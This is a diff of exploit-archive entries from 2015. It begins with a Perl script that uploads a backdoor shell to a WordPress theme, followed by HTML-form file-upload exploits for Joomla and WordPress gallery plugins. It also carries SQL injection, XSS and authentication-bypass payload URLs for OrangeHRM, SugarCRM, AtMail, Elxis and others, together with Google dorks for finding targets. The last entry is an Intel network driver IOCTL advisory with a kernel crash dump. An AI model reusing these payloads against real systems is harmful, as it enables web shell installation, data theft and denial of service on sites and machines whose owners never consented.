my $addr = inet_ntoa((gethostbyname($target))[4]);
my $digest = md5_hex($addr);
my $dir = encode_base64('../../../../');
my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
$pst = $ua->post("http://".$target."/wp-content/themes/designfolio-plus/admin/upload-file.php", Content_Type => 'form-data', Content => [ $digest => [$file] , upload_path => $dir ]);
if($pst->is_success) { print "[+] Backdoor Uploaded !"; } else { print "\n [-] Bad Response Header :/ FAIL"; }
__END__
# File path: http://target/shell.php

32
platforms/php/webapps/36373.txt Executable file
View file

@ -0,0 +1,32 @@
######################################################################
# Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload
# Google Dork: inurl:com_simplephotogallery
# Date: 10.03.2015
# Exploit Author: CrashBandicot @DosPerl
# My Github: github.com/CCrashBandicot
# Vendor Homepage: https://www.apptha.com/
# Software Link: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
# Version: 1
# Tested on: Windows
######################################################################
# Vulnerable File : uploadFile.php
# Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php
20. $fieldName = 'uploadfile';
87. $fileTemp = $_FILES[$fieldName]['tmp_name'];
94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96. if(! move_uploaded_file($fileTemp, $uploadPath))
# Exploit :
<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
<input type="file" name="uploadfile"><br>
<input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
# Name of Shell Show you after Click on Pwn!, Name is random (eg : backdoor__FDSfezfs.php)
# Shell Path : http://localhost/backdoor__[RandomString].php

28
platforms/php/webapps/36374.txt Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/reflex-gallery/
# Date: 08.03.2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: https://wordpress.org/plugins/reflex-gallery/
# Software Link: https://downloads.wordpress.org/plugin/reflex-gallery.zip
# Version: 3.1.3 (Last)
# Tested on: Windows
# p0C : http://i.imgur.com/mj8yADU.png
# Path : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
# add Month and Year in GET for Folder of Shell ./wp-content/uploads/" .$_GET['Year'].'/'.$_GET['Month']. "
Vulnerable File : php.php
50. if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){
173. $result = $uploader->handleUpload('../../../../../uploads/'.$_GET['Year'].'/'.$_GET['Month'].'/');
# Exploit :
<form method="POST" action="http://127.0.0.1:1337/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03" enctype="multipart/form-data" >
<input type="file" name="qqfile"><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
# Shell Path : http://127.0.0.1:1337/wordpress/wp-content/uploads/2015/03/backdoor.php

11
platforms/php/webapps/36379.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50857/info
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OrangeHRM 2.6.11 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php?menu_no_top=eim&uniqcode=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28123%29;% 3C/script%3E
http://www.example.com/index.php?menu_no_top=eim&uniqcode=USR&isAdmin=%22%3E%3C/iframe%3E%3Cscript%3E alert%28123%29;%3C/script%3E

9
platforms/php/webapps/36380.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50857/info
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OrangeHRM 2.6.11 is vulnerable; prior versions may also be affected.
http://www.example.com/lib/controllers/centralcontroller.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C /script%3E/?uniqcode=USR&VIEW=MAIN&isAdmin=1

9
platforms/php/webapps/36381.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50857/info
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OrangeHRM 2.6.11 is vulnerable; prior versions may also be affected.
http://www.example.com/lib/controllers/centralcontroller.php?capturemode=updatemode&uniqcode=NAT&id=1 %27%20union%20select%20version%28%29,user%28%29%20--%20

11
platforms/php/webapps/36382.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50860/info
1-jquery-photo-gallery-slideshow-flash plug-in for WordPress is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
1-jquery-photo-gallery-slideshow-flash 1.01 is vulnerable; other versions may also be affected.
UPDATE April 18, 2012: Further reports indicate this issue may not be a vulnerability; the issue can not be exploited as described.
http://www.example.com/[path]/wp-content/plugins/1-jquery-photo-gallery-slideshow-flash/wp-1pluginjquery.php?page=[xss]

7
platforms/php/webapps/36383.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50861/info
flash-album-gallery plug-in for WordPress is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/facebook.php?i=[xss]

11
platforms/php/webapps/36384.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50870/info
SugarCRM Community Edition is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SugarCRM Community Edition 6.3.0RC1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?entryPoint=json&action=get_full_list&module=Leads&where=0%29%20union%20select%20version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71%20--%20
http://www.example.com/index.php?entryPoint=json&action=get_full_list&module=Leads&order=SQL_CODE_HERE%20--%20

41
platforms/php/webapps/36385.txt Executable file
View file

@ -0,0 +1,41 @@
#======================================================================================
# Title : Joomla Simple Photo Gallery - SQL injection
#
# Author : Mr.Moneer
#
# Dork Google 1: inurl:/com_simplephotogallery site:com
# Dork Google 2: inurl:/com_simplephotogallery site:org
# Dork Google 3: inurl:/com_simplephotogallery site:fr
# Dork Google 4: inurl:/com_simplephotogallery/
#
# Date : 13-03-2015
#
#
# Vendor Homepage: https://www.apptha.com/
#
# Source Plugin:
https://www.apptha.com/category/extension/joomla/simple-photo-gallery
#
# Version : 1
#
# Tested on : sqlmap
#
#======================================================================================
#
# Example :
#
#
http://www.site.com/index.php?option=com_simplephotogallery&view=images&albumid=[Sqli]
#
#
# video Demo : http://youtu.be/-QjCMAB3vrg
#
# facebook : https://www.facebook.com/moneer.massoud
# youtube : https://www.youtube.com/user/moneermasoud
# google+ : https://plus.google.com/u/0/+moneermassoud
#
#
#
# Greets To : Alansary | Moad Hack | Ly Ghost
#
#======================================================================================

14
platforms/php/webapps/36386.txt Executable file
View file

@ -0,0 +1,14 @@
# Exploit Title: Smart PHP Poll Auth Bypass Vulnerability
# Google Dork: Copyright ? Smart PHP Poll. All Rights Reserved.
# Exploit Author: Mr.tro0oqy (from Yemen)
# Email : uxxd@hotmail.com
# Download Script :http://www.scriptsez.net/download/download.php?action=download&p=smart_php_poll.zip&ns=1
go to www.target.com/path/admin.php
username = admin 'or' 1=1
password = anything

10
platforms/php/webapps/36401.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50877/info
AtMail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
AtMail 1.0.4 is vulnerable; other versions may also be affected.
GET: http://www.example.com/search.php?func=<script>alert(&#039;XSS&#039;);</script>
GET: http://www.example.com/search.php?func=<script>alert(&#039;XSS&#039;);</script>

7
platforms/php/webapps/36406.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50910/info
Elxis CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/elxis/index.php?id=3&Itemid=9&option=com_content&task=%22%20onmouseover%3dprompt%28dclabs%29%20dcl%3d%22

7
platforms/php/webapps/36407.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50910/info
Elxis CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com//elxis/administrator/index.php/%22onmouseover=prompt(dclabs)%3E

9
platforms/php/webapps/36408.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50921/info
The Pretty Link plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Pretty Link 1.5.2 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/wp-content/plugins/pretty-link/pretty-bar.php?url=[xss]

9
platforms/php/webapps/36410.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50925/info
Simple Machines Forum is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Simple Machines Forum 1.1.15 is vulnerable; other versions may also be affected.
http://www.example.com/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

724
platforms/windows/dos/36392.txt Executable file
View file

@ -0,0 +1,724 @@
/*
Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability
Vendor: Intel
Product webpage: http://www.intel.com
Affected product(s):
Network Adapter Driver for Windows XP
Network Adapter Driver for Windows 7
Network Adapter Driver for Windows 8
Network Adapter Driver for Windows 2008/R2
Network Adapter Driver for Windows 2012/R2
Affected version(s):
Intel(R) iQVW64.SYS v1.03.0.7
Intel(R) iQVW32.SYS v1.03.0.7
Tested Operating systems:
Windows XP SP3 (32-bit)
Windows 7 SP1 (32/64-bit)
Date: 14/03/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-2291
Disclosure Timeline:
10-06-2014: Vendor Notification
21-06-2014: Vendor Response/Feedback
08-08-2014: Vendor Response/Feedback
26-08-2014: Requesting Status/No Vendor Response
30-09-2014: Requesting Status/No Vendor Response
22-10-2014: Requesting Status/No Vendor Response
10-01-2015: Requesting Status/No Vendor Response
15-01-2015: Requesting Status/No Vendor Response
14-03-2015: CVE Requested
14-03-2015: CVE Assigned
14-03-2015: Public Disclosure
Description:
A vulnerability in iqvw32.sys and iqvw64e.sys drivers has been discovered in Intel Network Adapter Driver.
The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes 0x80862013,
0x8086200B, 0x8086200F, 0x80862007 using METHOD_NEITHER and due to insecure permissions allowing everyone read and write
access to privileged use only functionality.
Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.
IOCTL 0x80862013
----------------
Microsoft (R) Windows Debugger Version 6.2.9200.20512 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
Opened \\.\pipe\com_2
Waiting to reconnect...
Connected to Windows 7 7601 x64 target at (Thu Feb 26 18:33:59.291 2015 (UTC + 2:00)), ptr64 TRUE
Kernel Debugger connection established.
Symbol search path is: srv*k:\symbols*http://msdl.microsoft.com/download/symbols;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\google*http://chromium-browser-symsrv.commondatastorage.googleapis.com;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\microsoft*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows 7 Kernel Version 7601 MP (1 procs) Free x64
Built by: 7601.18700.amd64fre.win7sp1_gdr.141211-1742
Machine Name:
Kernel base = 0xfffff800`03655000 PsLoadedModuleList = 0xfffff800`03898890
System Uptime: not available
KDTARGET: Refreshing KD connection
*** Fatal System Error: 0x0000003b
(0x00000000C0000005,0xFFFFF88005A0BFD2,0xFFFFF8800653A9C0,0x0000000000000000)
Break instruction exception - code 80000003 (first chance)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
Connected to Windows 7 7601 x64 target at (Thu Feb 26 20:29:05.978 2015 (UTC + 2:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
...............................
Loading User Symbols
.....
Loading unloaded module list
....Unable to enumerate user-mode unloaded modules, Win32 error 0n30
Loading Wow64 Symbols
.....
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
Use !analyze -v to get detailed debugging information.
BugCheck 3B, {c0000005, fffff88005a0bfd2, fffff8800653a9c0, 0}
*** ERROR: Module load completed but symbols could not be loaded for iqvw64e.sys
Followup: MachineOwner
---------
nt!RtlpBreakWithStatusInstruction:
fffff800`036c3cb0 cc int 3
3: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: fffff88005a0bfd2, Address of the instruction which caused the bugcheck
Arg3: fffff8800653a9c0, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.
Debugging Details:
------------------
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
FAULTING_IP:
iqvw64e+3fd2
fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx]
CONTEXT: fffff8800653a9c0 -- (.cxr 0xfffff8800653a9c0)
rax=0000f88005a696d1 rbx=0000000000000001 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff88005a0bfd2 rsp=fffff8800653b3a0 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei pl nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010202
iqvw64e+0x3fd2:
fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx] ds:002b:00000000`deadbeef=????????????????
Resetting default scope
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x3B
PROCESS_NAME: ConsoleApplica
CURRENT_IRQL: 2
LAST_CONTROL_TRANSFER: from fffff88005a091ac to fffff88005a0bfd2
STACK_TEXT:
fffff880`0653b3a0 fffff880`05a091ac : fffffa80`4aac7b00 00000000`00000001 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x3fd2
fffff880`0653b8a0 fffff800`039e80f7 : 00000000`80862013 fffff880`0653bb60 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x11ac
fffff880`0653b8d0 fffff800`039e8956 : fffff680`003b5ee8 00000000`00000000 00000000`00000000 00000000`00000000 : nt!IopXxxControlFile+0x607
fffff880`0653ba00 fffff800`036cb113 : 00000000`0021df01 0000007f`ffffffff 00000000`0021df00 00000980`00000000 : nt!NtDeviceIoControlFile+0x56
fffff880`0653ba70 00000000`73b02e09 : 00000000`73b02944 00000000`775a01b4 00000000`73b70023 00000000`00000246 : nt!KiSystemServiceCopyEnd+0x13
00000000`0021e898 00000000`73b02944 : 00000000`775a01b4 00000000`73b70023 00000000`00000246 00000000`001dff7c : wow64cpu!CpupSyscallStub+0x9
00000000`0021e8a0 00000000`73b7d286 : 00000000`00000000 00000000`73b01920 00000000`0021eb30 00000000`773decf1 : wow64cpu!DeviceIoctlFileFault+0x31
00000000`0021e960 00000000`73b7c69e : 00000000`00000000 00000000`00000000 00000000`73b74b10 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa
00000000`0021e9b0 00000000`773f4966 : 00000000`003331f0 00000000`00000000 00000000`774e2670 00000000`774b5978 : wow64!Wow64LdrpInitialize+0x42a
00000000`0021ef00 00000000`773f1937 : 00000000`00000000 00000000`773f4071 00000000`0021f4b0 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e3
00000000`0021f3f0 00000000`773dc34e : 00000000`0021f4b0 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? ::FNODOBFM::`string'+0x28ff0
00000000`0021f460 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe
FOLLOWUP_IP:
iqvw64e+3fd2
fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx]
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: iqvw64e+3fd2
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: iqvw64e
IMAGE_NAME: iqvw64e.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 5284eac3
STACK_COMMAND: .cxr 0xfffff8800653a9c0 ; kb
FAILURE_BUCKET_ID: X64_0x3B_iqvw64e+3fd2
BUCKET_ID: X64_0x3B_iqvw64e+3fd2
Followup: MachineOwner
---------
3: kd> u fffff880`05a0bfd2
iqvw64e+0x3fd2:
fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx]
fffff880`05a0bfd5 488d0d14160000 lea rcx,[iqvw64e+0x55f0 (fffff880`05a0d5f0)]
fffff880`05a0bfdc e84fdfffff call iqvw64e+0x1f30 (fffff880`05a09f30)
fffff880`05a0bfe1 488b17 mov rdx,qword ptr [rdi]
fffff880`05a0bfe4 488d42ff lea rax,[rdx-1]
fffff880`05a0bfe8 4883f807 cmp rax,7
fffff880`05a0bfec 0f8718020000 ja iqvw64e+0x420a (fffff880`05a0c20a)
fffff880`05a0bff2 488d0d07c0ffff lea rcx,[iqvw64e (fffff880`05a08000)]
3: kd> !for_each_frame .frame /r @$Frame
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction
00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction
rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000
rip=fffff800036c3cb0 rsp=fffff88006539988 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=000000000000003b r13=0000000000000001
r14=0000000040000082 r15=0000000000000003
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!RtlpBreakWithStatusInstruction:
fffff800`036c3cb0 cc int 3
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
01 fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12
01 fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12
rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000
rip=fffff800037bba62 rsp=fffff88006539990 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=000000000000003b r13=0000000000000001
r14=0000000040000082 r15=0000000000000003
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiBugCheckDebugBreak+0x12:
fffff800`037bba62 eb75 jmp nt!KiBugCheckDebugBreak+0x89 (fffff800`037bbad9)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
02 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e
02 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e
rax=0000000000000000 rbx=0000000000000065 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000
rip=fffff800037bc84e rsp=fffff880065399f0 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=000000000000003b r13=0000000000000001
r14=0000000040000082 r15=0000000000000003
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KeBugCheck2+0x71e:
fffff800`037bc84e eb11 jmp nt!KeBugCheck2+0x731 (fffff800`037bc861)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
03 fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104
03 fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036cbf84 rsp=fffff8800653a0c0 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KeBugCheckEx+0x104:
fffff800`036cbf84 90 nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
04 fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69
04 fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036cb429 rsp=fffff8800653a100 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiBugCheckDispatch+0x69:
fffff800`036cb429 90 nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
05 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c
05 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036cad7c rsp=fffff8800653a240 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiSystemServiceHandler+0x7c:
fffff800`036cad7c b801000000 mov eax,1
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
06 fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd
06 fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036f6a4d rsp=fffff8800653a280 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!RtlpExecuteHandlerForException+0xd:
fffff800`036f6a4d 90 nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
07 fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415
07 fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036f5825 rsp=fffff8800653a2b0 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!RtlDispatchException+0x415:
fffff800`036f5825 0fba257fc51d0017 bt dword ptr [nt!NtGlobalFlag (fffff800`038d1dac)],17h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
08 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135
08 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135
rax=0000000000000000 rbx=fffff8800653b168 rcx=0000000000000003
rdx=000000000000008a rsi=fffff8800653b210 rdi=00000000deadbeef
rip=fffff800037067b1 rsp=fffff8800653a990 rbp=fffff8800653aec0
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff8800653a9c0 r13=000000000010001f
r14=fffff8800653b030 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiDispatchException+0x135:
fffff800`037067b1 84c0 test al,al
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
09 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2
09 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2
rax=0000000000000000 rbx=0000000000000001 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff800036cb502 rsp=fffff8800653b030 rbp=fffff8800653b290
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiExceptionDispatch+0xc2:
fffff800`036cb502 488d8c2400010000 lea rcx,[rsp+100h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0a fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a
0a fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a
rax=0000000000000000 rbx=0000000000000001 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff800036ca07a rsp=fffff8800653b210 rbp=fffff8800653b290
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiPageFault+0x23a:
fffff800`036ca07a 440f20c0 mov rax,cr8
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0b fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2
0b fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2
rax=0000f88005a696d1 rbx=0000000000000001 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff88005a0bfd2 rsp=fffff8800653b3a0 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
iqvw64e+0x3fd2:
fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0c fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac
0c fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac
rax=0000f88005a696d1 rbx=fffffa804d1084d0 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=fffffa804d01e160
rip=fffff88005a091ac rsp=fffff8800653b8a0 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
